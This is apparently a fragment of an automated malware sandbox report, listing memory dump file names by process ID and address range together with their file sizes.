memory/2248-185-0x00000159EE1B0000-0x00000159EE1CC000-memory.dmpFilesize
112KB
-
memory/2248-184-0x00000159EE040000-0x00000159EE04A000-memory.dmpFilesize
40KB
-
memory/2248-182-0x00007FFD519A0000-0x00007FFD52461000-memory.dmpFilesize
10.8MB
-
memory/2260-206-0x0000000000000000-mapping.dmp
-
memory/2332-214-0x0000000000000000-mapping.dmp
-
memory/2392-155-0x0000000000000000-mapping.dmp
-
memory/2488-147-0x0000000000000000-mapping.dmp
-
memory/2496-200-0x0000000000000000-mapping.dmp
-
memory/2604-208-0x0000021B094C0000-0x0000021B094C7000-memory.dmpFilesize
28KB
-
memory/2604-231-0x00007FFD519A0000-0x00007FFD52461000-memory.dmpFilesize
10.8MB
-
memory/2604-209-0x00007FFD519A0000-0x00007FFD52461000-memory.dmpFilesize
10.8MB
-
memory/2776-159-0x00007FFD50C20000-0x00007FFD516E1000-memory.dmpFilesize
10.8MB
-
memory/2776-168-0x00007FFD50C20000-0x00007FFD516E1000-memory.dmpFilesize
10.8MB
-
memory/2776-146-0x0000000000000000-mapping.dmp
-
memory/2872-161-0x0000000000000000-mapping.dmp
-
memory/3096-212-0x0000000000000000-mapping.dmp
-
memory/3172-194-0x0000000000000000-mapping.dmp
-
memory/3184-213-0x0000000000000000-mapping.dmp
-
memory/3364-211-0x0000000000000000-mapping.dmp
-
memory/3396-149-0x0000000000000000-mapping.dmp
-
memory/3412-223-0x0000000000000000-mapping.dmp
-
memory/3444-225-0x0000000000000000-mapping.dmp
-
memory/3472-141-0x0000000000000000-mapping.dmp
-
memory/3516-217-0x0000000000000000-mapping.dmp
-
memory/3516-145-0x0000000000000000-mapping.dmp
-
memory/3524-198-0x0000000000000000-mapping.dmp
-
memory/3536-144-0x0000000000000000-mapping.dmp
-
memory/3536-216-0x0000000000000000-mapping.dmp
-
memory/3564-163-0x0000000000000000-mapping.dmp
-
memory/3724-215-0x0000000000000000-mapping.dmp
-
memory/3812-228-0x0000000000000000-mapping.dmp
-
memory/3816-143-0x0000000000000000-mapping.dmp
-
memory/3856-195-0x0000000000000000-mapping.dmp
-
memory/4112-151-0x0000000000000000-mapping.dmp
-
memory/4204-192-0x0000000000000000-mapping.dmp
-
memory/4244-172-0x00007FFD50C20000-0x00007FFD516E1000-memory.dmpFilesize
10.8MB
-
memory/4244-176-0x00007FFD50C20000-0x00007FFD516E1000-memory.dmpFilesize
10.8MB
-
memory/4260-165-0x0000000000000000-mapping.dmp
-
memory/4292-196-0x0000000000000000-mapping.dmp
-
memory/4356-164-0x0000000000000000-mapping.dmp
-
memory/4388-158-0x0000000000000000-mapping.dmp
-
memory/4484-218-0x0000000000000000-mapping.dmp
-
memory/4504-174-0x0000000000000000-mapping.dmp
-
memory/4600-170-0x00007FFD50C20000-0x00007FFD516E1000-memory.dmpFilesize
10.8MB
-
memory/4600-135-0x00007FFD50C20000-0x00007FFD516E1000-memory.dmpFilesize
10.8MB
-
memory/4600-134-0x000001C309370000-0x000001C3095C0000-memory.dmpFilesize
2.3MB
-
memory/4780-229-0x0000000000000000-mapping.dmp
-
memory/4852-162-0x0000000000000000-mapping.dmp
-
memory/4884-169-0x0000000000000000-mapping.dmp
-
memory/4944-140-0x0000000000000000-mapping.dmp
-
memory/4960-226-0x0000000000000000-mapping.dmp
-
memory/4984-219-0x0000000000000000-mapping.dmp
-
memory/5024-166-0x0000000000000000-mapping.dmp